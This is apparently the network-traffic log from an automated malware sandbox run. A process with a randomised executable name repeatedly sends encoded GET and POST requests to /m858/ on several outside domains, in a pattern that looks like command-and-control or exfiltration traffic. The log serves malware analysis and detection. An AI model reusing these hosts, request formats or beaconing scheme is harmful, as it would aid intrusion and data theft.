                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:49.673922062 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:49 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      28 | 192.168.2.11 | 49739 | 207.244.126.150 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:52.199393988 CET | 447 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIi3MNbBvSEuUIdbw== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:52.361907959 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:52 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      29 | 192.168.2.11 | 49740 | 162.240.81.18 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:54:57.885279894 CET | 725 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=2qGyi+XoXiouTjdqimJweq7I3THPohJza8Go3XuAlOj+YNl/ADTBTgPmukooB+OUs0VF0hGSnBqVEZgyVrGFpLzJq5wqZuJ8mAvp57J61LnXaU3gB6qc44f7VvxviWEJfvQ+p1bS4y3fQl04qjHjddquLXTnM+KPN/VM0CLb2fvJNmP8lw==
                                                                                                                      Dec 7, 2023 15:54:58.081706047 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:54:57 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 15:54:58.081760883 CET | 1286 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 15:54:58.081835985 CET | 1251 | IN | Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      30 | 192.168.2.11 | 49741 | 162.240.81.18 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:00.599354029 CET | 745 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=2qGyi+XoXiouSA1qvlhwbK7HrDHPhBJoa8Ko3TWQl83+YoB/BCTBQgPmmEoheuOPs0RN0gKSnAKVEY8yVYuKobzPlZwoUOJ8mAvp5/hQ1LfXdnvgAYCD1Yf4SvxvoGENfvQQpw654w/fQgI4qWq1WdqoF3SRfvLVIdYLqwDViorHIzjviDpvKaKc2n6+9KZPDCuYVOo=
                                                                                                                      Dec 7, 2023 15:55:00.795011997 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:00 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 15:55:00.795094013 CET | 1286 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 15:55:00.795110941 CET | 1251 | IN | Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.11 | 49742 | 162.240.81.18 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:03.322160959 CET | 1758 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:55:03.518553019 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:03 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Dec 7, 2023 15:55:03.518632889 CET | 1286 | IN |
Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Dec 7, 2023 15:55:03.518788099 CET | 1251 | IN |
Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.11 | 49743 | 162.240.81.18 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:55:06.037158012 CET | 446 | OUT | GET /m858/?yRV=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZpKv2rLMaYp9lnA==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:55:06.233273029 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:06 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Dec 7, 2023 15:55:06.233314037 CET | 1286 | IN |
Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Dec 7, 2023 15:55:06.233479023 CET | 1251 | IN |
Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.11 | 49744 | 68.178.195.71 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:55:11.571609020 CET | 725 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Origin: http://www.blessingstation.org
                                                                                                                      Referer: http://www.blessingstation.org/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=VYi+J6cf61/s73+iy0EqI48HnT9O/+jelIQuho2ssFMsJAU41nylbBElr0t089Z1Pp1jvsh6f40Yrs87A1JuWAsQGrdGo2PzYPXMf/ZLordEgLeMSdqPr65afZDEDyfOBu+f44BKKESRwBm+dJYGWhxofla7TFms43mxB39g5AjbCio7Rw==
Dec 7, 2023 15:55:11.949938059 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Encoding: br
                                                                                                                      Content-Length: 14735
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      34 | 192.168.2.11 | 49745 | 68.178.195.71 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:14.279906988 CET | 745 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Origin: http://www.blessingstation.org
                                                                                                                      Referer: http://www.blessingstation.org/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:14.654086113 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:11 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Encoding: br
                                                                                                                      Content-Length: 14735
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      35 | 192.168.2.11 | 49746 | 68.178.195.71 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:17.036076069 CET | 1758 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Origin: http://www.blessingstation.org
                                                                                                                      Referer: http://www.blessingstation.org/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:17.383914948 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:14 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Encoding: br
                                                                                                                      Content-Length: 14735
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      36 | 192.168.2.11 | 49747 | 68.178.195.71 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:19.748173952 CET | 446 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.blessingstation.org
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:20.024919987 CET | 527 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pSDhyD7Jeln3ZaQ==
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 0
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      37 | 192.168.2.11 | 49748 | 84.32.84.32 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:25.654483080 CET | 722 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=YVs+v3wKzPkCFZDhhlfxg9L7ppWfFMrOB/RPIyopFOuIma/5+DwDSLqjHIZJSyB/xjm6AMO6v/yWmYqkWrj5rikBPxYbSF1y93nBh4ZEDNvvINyQTROhbBxGQLJsocJuV9UCKIDGlEFO/AlzFaEvUsP67Im2h8j+ONLeZ4yZk024yNKHCg==


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      38 | 192.168.2.11 | 49749 | 84.32.84.32 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:28.361023903 CET | 742 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=YVs+v3wKzPkCE9HhnyzxldL6spWfPsqmB/VPI2xxE9aIm/T5/BIDXLqjTYZQWyBwxjqYAJ26v7aWmY6kXaj6qykDWhYZPV1y93nBh4N6DJDvJ46QS16gVhxBZrJs/sJqV9UwKMDglGNO/FZzEOYgasOQkYnzodScFcCyBKzmuRz13YmUFV/saac7hRVBchK1UPBO2ds=


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      39 | 192.168.2.11 | 49750 | 84.32.84.32 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:31.064364910 CET | 1755 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Origin: http://www.cjjmobbbshhhu.shop
                                                                                                                      Referer: http://www.cjjmobbbshhhu.shop/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      40 | 192.168.2.11 | 49751 | 84.32.84.32 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:55:33.767606020 CET | 445 | OUT | GET /m858/?yRV=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYozgxOSovEmgHpQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.cjjmobbbshhhu.shop
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:55:33.944278955 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: hcdn
                                                                                                                      Date: Thu, 07 Dec 2023 14:55:33 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 10066
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      x-hcdn-request-id: 5333c2536099ed31505bbe105e85a680-phx-edge3
                                                                                                                      Expires: Thu, 07 Dec 2023 14:55:32 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
